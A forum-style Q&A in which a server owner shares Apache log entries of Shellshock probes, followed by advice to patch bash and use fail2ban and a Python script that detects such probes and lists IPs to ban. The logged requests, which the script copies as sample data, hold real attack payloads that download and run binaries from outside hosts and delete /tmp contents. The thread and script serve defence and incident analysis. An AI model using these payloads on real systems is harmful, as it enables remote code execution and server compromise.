
So, after setting up a new server with just SSH (public key only) and a webserver which just serves one index.html, I left for the weekend. Logging in on Monday, I see this type of thing in my httpd access_logs:

5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

and

61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

and lots more of that sort. This China.Z guy in particular was very insistent. I basically understand what this is, that they are probing my machine and trying to get info about it (right?), but

  • during the weekend, when there should have been no traffic on the machine (as I said, there is nothing running on it), there was about 200 MB of outbound traffic
  • httpd was restarted during this time; as far as I can tell that shouldn't have happened
  • some of these requests returned 200 (the "/" ones for instance), should I be worried?

These two examples are indeed larger tries, with many requests from the same IP, but there are many others with just one request per IP.

So, should I worry about this? I've shut down my Apache and also closed the relevant ports in the firewall, but I will need Apache running on this machine. Also, is there something I can or should do to prevent this?

Also: this machine is internet-facing and has a fixed IP; I'm guessing that's why I'm getting pounded.

Thanks :)

peph
  • Seems one can't send private messages here, which is unfortunate. 5.199.170.44 was my server, which was compromised this morning via a Shellshock entrypoint (around a similar time to when it hit you above), and which is now undergoing cleaning. Just wanted to offer my apologies. – Andrew Apr 07 '15 at 19:48
  • Wow the world is small ^^ no worries though, as posted above as far as I can tell all is well and my system should be safe. Good luck cleaning yours :) – peph Apr 07 '15 at 20:15

1 Answer


You are being hit with Shellshock attempts. As long as you have patched your bash, you should be safe against these attempts. However, you might want to invest in a system for banning repeat system abusers. Try fail2ban.

What is a specific example of how the Shellshock Bash bug could be exploited?

If you haven't patched bash, you are in big, big trouble.

MrSynAckSter
  • Agree on all counts. – armani Apr 07 '15 at 16:48
  • 1
    Thanks for the info :) I ran the shellshock-test from https://shellshocker.net/ , all seems fine, as in - my system seems to not be vulnerable against shellshock. After seeing those logs today I already got fail2ban up and running, thanks for the suggestion. – peph Apr 07 '15 at 20:14
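An added example, not code from the question or the answer above, that does mechanically what the answer suggests: it parses combined-format access log lines like the ones in the question, flags requests whose request line, Referer or User-Agent carries the bash function-definition prefix that Shellshock (CVE-2014-6271) abuses, pulls the second-stage download URLs out as indicators, and applies a fail2ban-style per-IP maxretry count to decide who to ban. The sample lines are the question's own (the PHP payload trimmed after its two URLs); the one-off probe from 198.51.100.23 and the benign request from 203.0.113.7 are constructed for contrast, and maxretry=2 is an assumed threshold for this example, not fail2ban's default. The 200 on "GET /" only says index.html was served; whether the header ever reached bash depends on a CGI script existing and invoking it, which the 404s on /cgi-sys/... show those probes did not find.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example, not code from the original post. Sample log lines are the
question's own plus two constructed ones (marked below).
"""
import re
from collections import Counter

# Apache "combined" LogFormat. Quoted fields may contain backslash escapes:
# Apache writes a literal " inside a field as \" and non-printables as \xNN,
# which is why the China.Z payload shows a literal "\xa0" in the question.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger: a bash function definition "() { ... };" placed in
# any header that a CGI handler would export to bash as an environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Second-stage payload URLs the attacker wants the victim to fetch (IOCs).
URL_RE = re.compile(r'https?://[^\s"\'\\;]+')

# Sample input: question's lines (PHP payload trimmed after its two URLs), then
# two CONSTRUCTED lines: a one-off probe (198.51.100.23) and a benign request.
SAMPLE_LOG = r"""
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";'" "-"
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
198.51.100.23 - - [07/Apr/2015:15:02:11 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :;}; /bin/bash -c \"id\""
203.0.113.7 - - [07/Apr/2015:09:00:00 +0200] "GET /index.html HTTP/1.1" 200 66 "-" "Mozilla/5.0 (X11; Linux x86_64)"
""".strip().splitlines()


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def is_shellshock(entry):
    """True if the request line, Referer or User-Agent carries a bash function definition."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ('request', 'referer', 'agent'))


def payload_urls(entry):
    """URLs embedded in attacker-controlled fields: the droppers the payload would fetch."""
    urls = set()
    for f in ('request', 'referer', 'agent'):
        urls.update(URL_RE.findall(entry[f]))
    return urls


def analyze(lines, maxretry=2):
    """Scan log lines and return hits, per-IP counts, IOC URLs, 200-responses and a ban list.

    maxretry mirrors fail2ban's setting: a source with at least that many
    Shellshock probes is listed for banning. 2 is an assumed value for this
    example so that both multi-request sources from the question qualify.
    """
    hits, by_ip, urls, served_200 = [], Counter(), set(), []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not is_shellshock(entry):
            continue
        hits.append(entry)
        by_ip[entry['ip']] += 1
        urls |= payload_urls(entry)
        if entry['status'] == '200':
            # A 200 means the requested path existed; it does not show the payload ran.
            served_200.append((entry['ip'], entry['request']))
    ban = sorted(ip for ip, n in by_ip.items() if n >= maxretry)
    return {'hits': hits, 'by_ip': by_ip, 'urls': urls, 'served_200': served_200, 'ban': ban}


if __name__ == '__main__':
    result = analyze(SAMPLE_LOG)
    print(f"{len(result['hits'])} Shellshock probes from {len(result['by_ip'])} sources")
    for ip, n in result['by_ip'].most_common():
        print(f"  {ip:16} {n} probe(s)")
    print("payload URLs:", *sorted(result['urls']), sep='\n  ')
    print("ban list (maxretry=2):", result['ban'])
```

Run it as a script for a summary, or feed `analyze()` the lines of a real access_log. With `maxretry=3` only 5.199.170.44 makes the ban list, which is the same tuning decision a fail2ban jail forces you to make between catching repeat scanners and ignoring one-off probes.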